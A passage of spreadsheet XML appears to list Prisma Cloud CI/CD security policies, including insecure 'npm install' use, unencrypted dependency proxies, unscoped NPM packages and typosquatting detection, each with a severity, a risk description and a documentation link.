      <c r="AC180" t="inlineStr"/>
      <c r="AD180" t="b">
        <v>1</v>
      </c>
      <c r="AE180" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF180" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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0" t="inlineStr">
        <is>
          <t>23fa11d9-6b95-4278-b1b4-a99f96e52b11</t>
        </is>
      </c>
      <c r="AI180" t="inlineStr"/>
      <c r="AJ180" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK180" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" t="inlineStr"/>
      <c r="B181" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C181" s="2" t="inlineStr"/>
      <c r="D181" t="inlineStr"/>
      <c r="E181" t="inlineStr"/>
      <c r="F181" t="inlineStr"/>
      <c r="G181" t="b">
        <v>1</v>
      </c>
      <c r="H1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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J181" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K181" t="inlineStr">
        <is>
          <t>Forking of a private GitHub repository is allowed</t>
        </is>
      </c>
      <c r="L181" t="inlineStr"/>
      <c r="M181" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N181" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O181" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P181" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q181" t="inlineStr"/>
      <c r="R181" t="inlineStr"/>
      <c r="S181" t="inlineStr"/>
      <c r="T181" t="b">
        <v>0</v>
      </c>
      <c r="U181" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V181" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W181" t="inlineStr">
        <is>
          <t>Forking is allowed on private repositories, allowing user accounts with 'read' permissions only to fork a repository to another organization or user account. This could lead to a decrease in security as SAML SSO may not be mandatory for authentication when accessing a forked repository. Another security concern is that pull requests can be generated from forked repositories, which may result in a PPE attack.</t>
        </is>
      </c>
      <c r="X181" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-fork-private-repo-allowed</t>
        </is>
      </c>
      <c r="Y181" t="inlineStr"/>
      <c r="Z181" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA181" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB181" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC181" t="inlineStr"/>
      <c r="AD181" t="b">
        <v>1</v>
      </c>
      <c r="AE181" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF181" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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1" t="inlineStr">
        <is>
          <t>76b4267b-e40b-45ed-aa6f-295b5c06f2ac</t>
        </is>
      </c>
      <c r="AI181" t="inlineStr"/>
      <c r="AJ181" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK181" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" t="inlineStr"/>
      <c r="B182" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C182" s="2" t="inlineStr"/>
      <c r="D182" t="inlineStr"/>
      <c r="E182" t="inlineStr"/>
      <c r="F182" t="inlineStr"/>
      <c r="G182" t="b">
        <v>1</v>
      </c>
      <c r="H1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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J182" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K182" t="inlineStr">
        <is>
          <t>CircleCI pipeline commands transmit data over an unencrypted channel</t>
        </is>
      </c>
      <c r="L182" t="inlineStr"/>
      <c r="M182" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N182" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O182" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P182" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q182" t="inlineStr"/>
      <c r="R182" t="inlineStr"/>
      <c r="S182" t="inlineStr"/>
      <c r="T182" t="b">
        <v>0</v>
      </c>
      <c r="U182" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V182" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W182" t="inlineStr">
        <is>
          <t>Pipeline commands transmitting data over an unencrypted layer such as HTTP allow attackers to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X182" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-transmitdata-unsecuredchannel</t>
        </is>
      </c>
      <c r="Y182" t="inlineStr"/>
      <c r="Z182" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA182" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB182" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC182" t="inlineStr"/>
      <c r="AD182" t="b">
        <v>1</v>
      </c>
      <c r="AE182" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF182" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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2" t="inlineStr">
        <is>
          <t>d2004717-1afe-4be6-b9b9-99df665e09b2</t>
        </is>
      </c>
      <c r="AI182" t="inlineStr"/>
      <c r="AJ182" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK182" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" t="inlineStr"/>
      <c r="B183" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C183" s="2" t="inlineStr"/>
      <c r="D183" t="inlineStr"/>
      <c r="E183" t="inlineStr"/>
      <c r="F183" t="inlineStr"/>
      <c r="G183" t="b">
        <v>1</v>
      </c>
      <c r="H1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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J183" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K183" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of a GitHub repository to download dependencies from proxy</t>
        </is>
      </c>
      <c r="L183" t="inlineStr"/>
      <c r="M183" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N183" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O183" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P183" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q183" t="inlineStr"/>
      <c r="R183" t="inlineStr"/>
      <c r="S183" t="inlineStr"/>
      <c r="T183" t="b">
        <v>0</v>
      </c>
      <c r="U183" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V183" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W183" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages through a proxy can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X183" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-unencrypted-channel-download-dependencies-proxy</t>
        </is>
      </c>
      <c r="Y183" t="inlineStr"/>
      <c r="Z183" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA183" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB183" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC183" t="inlineStr"/>
      <c r="AD183" t="b">
        <v>1</v>
      </c>
      <c r="AE183" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF183" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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3" t="inlineStr">
        <is>
          <t>7bf4a5a8-78ad-4f21-9361-0fbc0efc4db1</t>
        </is>
      </c>
      <c r="AI183" t="inlineStr"/>
      <c r="AJ183" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK183" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" t="inlineStr"/>
      <c r="B184" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C184" s="2" t="inlineStr"/>
      <c r="D184" t="inlineStr"/>
      <c r="E184" t="inlineStr"/>
      <c r="F184" t="inlineStr"/>
      <c r="G184" t="b">
        <v>1</v>
      </c>
      <c r="H1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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J184" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K184" t="inlineStr">
        <is>
          <t>Packages insecurely installed through “npm install” command in GitHub Actions pipeline</t>
        </is>
      </c>
      <c r="L184" t="inlineStr"/>
      <c r="M184" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N184" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O184" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P184" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q184" t="inlineStr"/>
      <c r="R184" t="inlineStr"/>
      <c r="S184" t="inlineStr"/>
      <c r="T184" t="b">
        <v>0</v>
      </c>
      <c r="U184" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V184" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W184" t="inlineStr">
        <is>
          <t>In common package.json configurations, the \"npm install\" command updates and installs package versions. \"npm install\" doesn`t check for package integrity, allowing attackers who have gained control of a dependency package to upload a malicious version, which is then downloaded and installed automatically when running \"npm install\".</t>
        </is>
      </c>
      <c r="X184" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-packages-insecurely-installed-npminstall</t>
        </is>
      </c>
      <c r="Y184" t="inlineStr"/>
      <c r="Z184" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA184" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB184" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC184" t="inlineStr"/>
      <c r="AD184" t="b">
        <v>1</v>
      </c>
      <c r="AE184" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF184" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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4" t="inlineStr">
        <is>
          <t>850229a6-cf9a-42e8-9d7c-3dfec707f506</t>
        </is>
      </c>
      <c r="AI184" t="inlineStr"/>
      <c r="AJ184" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK184" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" t="inlineStr"/>
      <c r="B185" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C185" s="2" t="inlineStr"/>
      <c r="D185" t="inlineStr"/>
      <c r="E185" t="inlineStr"/>
      <c r="F185" t="inlineStr"/>
      <c r="G185" t="b">
        <v>1</v>
      </c>
      <c r="H1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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J185" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K185" t="inlineStr">
        <is>
          <t>Internal NPM package is not scoped in Azure repository</t>
        </is>
      </c>
      <c r="L185" t="inlineStr"/>
      <c r="M185" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N185" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O185" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P185" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q185" t="inlineStr"/>
      <c r="R185" t="inlineStr"/>
      <c r="S185" t="inlineStr"/>
      <c r="T185" t="b">
        <v>0</v>
      </c>
      <c r="U185" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V185" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W185" t="inlineStr">
        <is>
          <t>Any third party can publish unscoped packages to the public NPM registry. If the organization does not own the names of the internal packages on the public registry, attackers could potentially upload malicious packages to the registry with identical or similar names, hoping that clients who have not configured their `.npmrc` files to fetch packages from the internal registry will mistakenly download them. Scoping packages in NPM can help protect against "Dependency Confusion" and Typosquatting attacks. This is because each NPM user/organization has their own scope, and only the user/organization`s owner can add packages to that scope. As a result, third parties cannot take the package name. Note: The package source displayed in the event field can be specified using one of the following methods described in these examples: • URL: https://registry.npmjs.org/example/-/example-1.0.0.tgz • Git URL: git+ssh://git@github.com/org/repo.git • Local file path: file:../foo/bar • Local linked package: folder/package</t>
        </is>
      </c>
      <c r="X185" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-internal-npm-package-not-scoped-repo</t>
        </is>
      </c>
      <c r="Y185" t="inlineStr"/>
      <c r="Z185" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA185" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB185" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC185" t="inlineStr"/>
      <c r="AD185" t="b">
        <v>1</v>
      </c>
      <c r="AE185" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF185" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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5" t="inlineStr">
        <is>
          <t>5793eabd-610f-46fe-9514-dbf8d5a6dfea</t>
        </is>
      </c>
      <c r="AI185" t="inlineStr"/>
      <c r="AJ185" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK185" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" t="inlineStr"/>
      <c r="B186" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C186" s="2" t="inlineStr"/>
      <c r="D186" t="inlineStr"/>
      <c r="E186" t="inlineStr"/>
      <c r="F186" t="inlineStr"/>
      <c r="G186" t="b">
        <v>1</v>
      </c>
      <c r="H1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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J186" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K186" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of an Azure repository to download dependencies from proxy</t>
        </is>
      </c>
      <c r="L186" t="inlineStr"/>
      <c r="M186" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N186" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O186" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P186" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q186" t="inlineStr"/>
      <c r="R186" t="inlineStr"/>
      <c r="S186" t="inlineStr"/>
      <c r="T186" t="b">
        <v>0</v>
      </c>
      <c r="U186" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V186" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W186" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages through a proxy can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X186" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-unencrypted-channel-download-dependecies-proxy</t>
        </is>
      </c>
      <c r="Y186" t="inlineStr"/>
      <c r="Z186" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA186" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB186" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC186" t="inlineStr"/>
      <c r="AD186" t="b">
        <v>1</v>
      </c>
      <c r="AE186" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF186" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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6" t="inlineStr">
        <is>
          <t>ddf8824d-3a23-4ff2-b4b6-accc4669a726</t>
        </is>
      </c>
      <c r="AI186" t="inlineStr"/>
      <c r="AJ186" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK186" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" t="inlineStr"/>
      <c r="B187" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C187" s="2" t="inlineStr"/>
      <c r="D187" t="inlineStr"/>
      <c r="E187" t="inlineStr"/>
      <c r="F187" t="inlineStr"/>
      <c r="G187" t="b">
        <v>1</v>
      </c>
      <c r="H1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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J187" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K187" t="inlineStr">
        <is>
          <t>Missing '.npmrc' file in Azure repository</t>
        </is>
      </c>
      <c r="L187" t="inlineStr"/>
      <c r="M187" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N187" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O187" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P187" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q187" t="inlineStr"/>
      <c r="R187" t="inlineStr"/>
      <c r="S187" t="inlineStr"/>
      <c r="T187" t="b">
        <v>0</v>
      </c>
      <c r="U187" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V187" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W187" t="inlineStr">
        <is>
          <t>The .npmrc file is a configuration file used by npm, the Node Package Manager, to manage settings and options related to package installation and publishing. Failing to store the .npmrc file in the repository can make the project vulnerable during pipelines to both dependency confusion, by allowing an internal package to be fetched from the public registry, as well as insecure use of credentials.</t>
        </is>
      </c>
      <c r="X187" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-missing-npmrc-file</t>
        </is>
      </c>
      <c r="Y187" t="inlineStr"/>
      <c r="Z187" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA187" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB187" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC187" t="inlineStr"/>
      <c r="AD187" t="b">
        <v>1</v>
      </c>
      <c r="AE187" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF187" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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7" t="inlineStr">
        <is>
          <t>77a2446a-daf2-49c7-9fc4-5e67130d4e89</t>
        </is>
      </c>
      <c r="AI187" t="inlineStr"/>
      <c r="AJ187" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK187" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" t="inlineStr"/>
      <c r="B188" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C188" s="2" t="inlineStr"/>
      <c r="D188" t="inlineStr"/>
      <c r="E188" t="inlineStr"/>
      <c r="F188" t="inlineStr"/>
      <c r="G188" t="b">
        <v>1</v>
      </c>
      <c r="H1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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J188" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K188" t="inlineStr">
        <is>
          <t>Possible Python typosquatting detected in a Bitbucket repository</t>
        </is>
      </c>
      <c r="L188" t="inlineStr"/>
      <c r="M188" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N188" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O188" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P188" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q188" t="inlineStr"/>
      <c r="R188" t="inlineStr"/>
      <c r="S188" t="inlineStr"/>
      <c r="T188" t="b">
        <v>0</v>
      </c>
      <c r="U188" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V188" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W188" t="inlineStr">
        <is>
          <t>Typosquatting attacks involve the registration of malicious packages in public registries, using names that closely resemble popular or internal packages used by an organization. The objective is to exploit users' mistakes when typing package names, resulting in the unintentional download of the malicious package. Running malicious packages on developers endpoints or in CI pipelines can lead to credential theft, source code leakage, code tampering and more.</t>
        </is>
      </c>
      <c r="X188" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-possible-python-typosquat-repo</t>
        </is>
      </c>
      <c r="Y188" t="inlineStr"/>
      <c r="Z188" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA188" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB188" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC188" t="inlineStr"/>
      <c r="AD188" t="b">
        <v>1</v>
      </c>
      <c r="AE188" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF188" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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8" t="inlineStr">
        <is>
          <t>9298bbd8-7dfb-4a61-8a10-e58bf3f2004b</t>
        </is>
      </c>
      <c r="AI188" t="inlineStr"/>
      <c r="AJ188" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK188" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" t="inlineStr"/>
      <c r="B189" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C189" s="2" t="inlineStr"/>
      <c r="D189" t="inlineStr"/>
      <c r="E189" t="inlineStr"/>
      <c r="F189" t="inlineStr"/>
      <c r="G189" t="b">
        <v>1</v>
      </c>
      <c r="H1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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J189" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K189" t="inlineStr">
        <is>
          <t>Packages insecurely installed through “npm install” command in Circle CI pipeline</t>
        </is>
      </c>
      <c r="L189" t="inlineStr"/>
      <c r="M189" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N189" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O189" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P189" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q189" t="inlineStr"/>
      <c r="R189" t="inlineStr"/>
      <c r="S189" t="inlineStr"/>
      <c r="T189" t="b">
        <v>0</v>
      </c>
      <c r="U189" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V189" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W189" t="inlineStr">
        <is>
          <t>In common package.json configurations, the \"npm install\" command updates and installs package versions. \"npm install\" doesn`t check for package integrity, allowing attackers who have gained control of a dependency package to upload a malicious version, which is then downloaded and installed automatically when running \"npm install\".</t>
        </is>
      </c>
      <c r="X189" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-packages-insecurely-installed-npminstall</t>
        </is>
      </c>
      <c r="Y189" t="inlineStr"/>
      <c r="Z189" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA189" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB189" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC189" t="inlineStr"/>
      <c r="AD189" t="b">
        <v>1</v>
      </c>
      <c r="AE189" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF189" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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9" t="inlineStr">
        <is>
          <t>40f2966e-357f-4c45-93a7-2394e11d571d</t>
        </is>
      </c>
      <c r="AI189" t="inlineStr"/>
      <c r="AJ189" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK189" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" t="inlineStr"/>
      <c r="B190" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C190" s="2" t="inlineStr"/>
      <c r="D190" t="inlineStr"/>
      <c r="E190" t="inlineStr"/>
      <c r="F190" t="inlineStr"/>
      <c r="G190" t="b">
        <v>1</v>
      </c>
      <c r="H1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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J190" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K190" t="inlineStr">
        <is>
          <t>Packages insecurely installed through “npm install” command in GitLab CI pipeline</t>
        </is>
      </c>
      <c r="L190" t="inlineStr"/>
      <c r="M190" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N190" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O190" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P190" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q190" t="inlineStr"/>
      <c r="R190" t="inlineStr"/>
      <c r="S190" t="inlineStr"/>
      <c r="T190" t="b">
        <v>0</v>
      </c>
      <c r="U190" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V190" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W190" t="inlineStr">
        <is>
          <t>In common package.json configurations, the \"npm install\" command updates and installs package versions. \"npm install\" doesn`t check for package integrity, allowing attackers who have gained control of a dependency package to upload a malicious version, which is then downloaded and installed automatically when running \"npm install\".</t>
        </is>
      </c>
      <c r="X190" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
